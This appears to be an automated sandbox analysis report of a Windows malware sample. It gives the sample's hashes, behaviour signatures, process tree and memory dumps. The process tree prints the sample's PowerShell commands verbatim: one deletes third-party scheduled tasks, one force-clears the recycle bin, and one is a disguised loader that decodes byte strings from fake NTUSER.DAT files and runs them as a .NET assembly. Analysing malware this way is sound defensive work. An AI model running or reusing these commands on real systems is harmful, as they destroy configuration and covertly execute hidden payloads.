Analysis

  • max time kernel
    96s
  • max time network
    97s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    19-09-2024 07:05

General

  • Target

    5cf02ef8ba3cb12bacf44b35ae71e53357ecfadffbebf02057004c791bedb476N.exe

  • Size

    4.8MB

  • MD5

    314416cd8a7ca237e550fd7b77acf770

  • SHA1

    fb7e229e6782aba64a9d781d0605aed586627331

  • SHA256

    5cf02ef8ba3cb12bacf44b35ae71e53357ecfadffbebf02057004c791bedb476

  • SHA512

    831b85064956d3372f7e7019900aea5c96cfa4ae9b3d1a2ff904376191fe1fc2452d7d13ce701b3fce3765c867effd4d0b6c0d5f7d1d725c79ed9c53f8621f1d

  • SSDEEP

    49152:uqj00f62wSvIi8kyyOiIBQoKHnHuB1UAjwqbMVaydWfOHSCyN78/NW6g/yjKj63W:uieSvPy0IKoKHHIMzx5bN84s

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 1 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5cf02ef8ba3cb12bacf44b35ae71e53357ecfadffbebf02057004c791bedb476N.exe
    "C:\Users\Admin\AppData\Local\Temp\5cf02ef8ba3cb12bacf44b35ae71e53357ecfadffbebf02057004c791bedb476N.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4220
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -Command " $tasks = Get-ScheduledTask | Where-Object { $_.TaskPath -notlike '\Microsoft\Windows\*' -and $_.TaskName -ne 'VideoConvertor' } foreach ($task in $tasks) { try { Unregister-ScheduledTask -TaskName $task.TaskName -Confirm:$false } catch { continue } } "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1916
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -Command "Clear-RecycleBin -Force -ErrorAction SilentlyContinue"
      2⤵
      • Enumerates connected drives
      • Hide Artifacts: Ignore Process Interrupts
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3564
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -Command " Function Init-VideoCache ([String] $CacheBuffer) { $CacheList = [System.Collections.Generic.List[Byte]]::new(); for ($i = 0; $i -lt $CacheBuffer.Length; $i += 8) { $CacheList.Add([Convert]::ToByte($CacheBuffer.Substring($i, 8), 2)) } return [System.Text.Encoding]::ASCII.GetString($CacheList.ToArray()) }; function Clear-VideoTempFiles { param([string] $tempPath) $tempFiles = $tempPath.Split(' ') $buffer = New-Object 'byte[]' ($tempFiles.Count / 2) $count = 0 for ($i = 0; $i -lt $tempFiles.Count - 1; $i += 2) { $buffer[$count] = [byte]($tempFiles[$i]) $count++ } return $buffer } $TempCache = Clear-VideoTempFiles (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{428f1209-1254-13ef-ada4-080027dede23}.TxR.blf') $BootImage = Clear-VideoTempFiles (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{4280000a-1254-11ef-ada2-080007dede23}.TM.blf') $BootParser = Init-VideoCache(Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{54ss24a-13354-13f-aad43-333333}.TM.blf') $SystemConfig = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{428f120a-1254-eeeef-ada2-080027dede23}.TM.blf') $CleanupTask = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{428f4444a-13354-11ef-sdd2-080027dede23}.TM.blf') $Image = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{428f4444a-13354-11ef-aad43-080027dede23}.TM.blf') $Module = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{543454444a-13354-11ef-aad43-080027dede23}.TM.blf') $LookupModule = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{543ss44a-13354-113f-aad43-08227dede23}.TM.blf') $ModuleParams = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{54ss24a-13354-13f-aad43-5227de33}.TM.blf') $SystemAssembly = [Reflection.Assembly] $SystemAssembly::$Module([Byte[]]$BootImage).$LookupModule($SystemConfig).$ModuleParams($CleanupTask).$Image($null,[Object[]]($BootParser,[Byte[]]$TempCache)) "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3708

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    661739d384d9dfd807a089721202900b

    SHA1

    5b2c5d6a7122b4ce849dc98e79a7713038feac55

    SHA256

    70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

    SHA512

    81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    f3b2f7c8e9b3057a4342efce5cb1f648

    SHA1

    cbcab1b48cd397259c504d2c915c5c30ea877b06

    SHA256

    2c3dc036ac8d51e14510a0a6bba650d29e55c394b3b564a5f762c2fc1ebc3693

    SHA512

    f627a062084919835cdfadcaa06849d6a636e4b2f6a24317c29e78183c02b4e2ffa9cf0911f627efc2143514695a1b3e70141866f61c722039721182cd5fb142

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    64B

    MD5

    9a9f097131cf0a3486b843bcdbfe297c

    SHA1

    1e3988e316721aa0e8c6f659fa4e8a0217739028

    SHA256

    dc773c20d59f6886b1a5b813abc4da6ce98abb0ade60b2ebabb091f55e265abd

    SHA512

    efc807932ae6ab83d0dfbad3384655a0b44648a163c71f31f7cd9003d7dea83371d08caba46bf6837f99dae2fe201cd902da33c40e37cc7d2671db7d9f79210d

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tfuxjptm.2dm.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1916-16-0x00007FFD85C80000-0x00007FFD86741000-memory.dmp

    Filesize

    10.8MB

  • memory/1916-15-0x00007FFD85C80000-0x00007FFD86741000-memory.dmp

    Filesize

    10.8MB

  • memory/1916-0-0x00007FFD85C83000-0x00007FFD85C85000-memory.dmp

    Filesize

    8KB

  • memory/1916-12-0x00007FFD85C80000-0x00007FFD86741000-memory.dmp

    Filesize

    10.8MB

  • memory/1916-11-0x00007FFD85C80000-0x00007FFD86741000-memory.dmp

    Filesize

    10.8MB

  • memory/1916-1-0x000002679FFB0000-0x000002679FFD2000-memory.dmp

    Filesize

    136KB

  • memory/3564-18-0x00007FFD85C80000-0x00007FFD86741000-memory.dmp

    Filesize

    10.8MB

  • memory/3564-19-0x00007FFD85C80000-0x00007FFD86741000-memory.dmp

    Filesize

    10.8MB

  • memory/3564-31-0x00007FFD85C80000-0x00007FFD86741000-memory.dmp

    Filesize

    10.8MB

  • memory/3708-44-0x0000022FF0E60000-0x0000022FF107C000-memory.dmp

    Filesize

    2.1MB

  • memory/4220-32-0x00007FF7362E0000-0x00007FF736766000-memory.dmp

    Filesize

    4.5MB